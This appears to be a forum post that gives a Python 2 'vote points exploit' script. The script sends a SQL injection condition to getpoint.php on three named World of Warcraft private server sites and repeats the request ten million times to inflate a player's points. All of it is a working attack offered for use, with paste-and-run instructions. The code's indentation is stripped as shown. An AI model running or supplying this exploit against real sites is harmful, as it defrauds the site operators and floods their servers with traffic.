Ok so listen up copy this to a txt file then rename it to .py you need a program called Python .Instal the program , run the script and Enjoy
from socket import *
from time import sleep
port = 80
#new way faster voting
request_pt1 = "/getpoint.php?url=leet'+or+1='1+--&char=" #b sql inj condition = true
request_pt2 = '&sn=1234809692227'
print('[-]getpoint.php Vote Points Exploit By DarkInjection')
print('[-]Usage Its Simple Just Give The Name To Add Some Points And Thats It')
print('[-]Current Exploitable Realms :')
print('\t*-->eternion-wow id[1]')
print('\t*-->WoW-Wal id[2]')
print('\t*-->wowolympc.com id[3]')
name = raw_input('[*]Enter The Name To Vote Exploit: ')
realm = raw_input('[*]Enter The Realm Id To Vote Exploit: ')
if(len(name) > 0):
print('[-]Name : '+name)
else:
print('gttk')
exit(1)
if(int(realm) == int(1)):
target = 'www.antwow.com'
if(int(realm) == int(2)):
target = 'www.wowwal.com'
if(int(realm) == int(3)):
target = 'www.wowolympc.com'
#basic browser request
server_request ='GET '
server_request +=request_pt1
server_request +=name
server_request +=request_pt2
server_request +=' HTTP/1.1\r\n'
server_request +='Host: '+target+'\r\n'
server_request +='User-Agent: Mozilla/5.0\r\n'
server_request +='Keep-Alive: 300\r\n'
server_request +='Connection: Keep-Alive\r\n\r\n'
#server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n' we dont need the cookie
#since **** up everything
count = 10000000#times to send votes to take:P
print('[*]Requesting The Server !')
for i in range(0,int(count)):
try:
i = socket(AF_INET,SOCK_STREAM)
except:
print('[/]Error In SOcket Function')
try:
i.connect((target,int(port)))
except:
print('[/]Error In Connect()')
try:
i.send(server_request)
print('[*]Request.....')
print(i.recv(10000))
except:
print('[/]Error In Send()')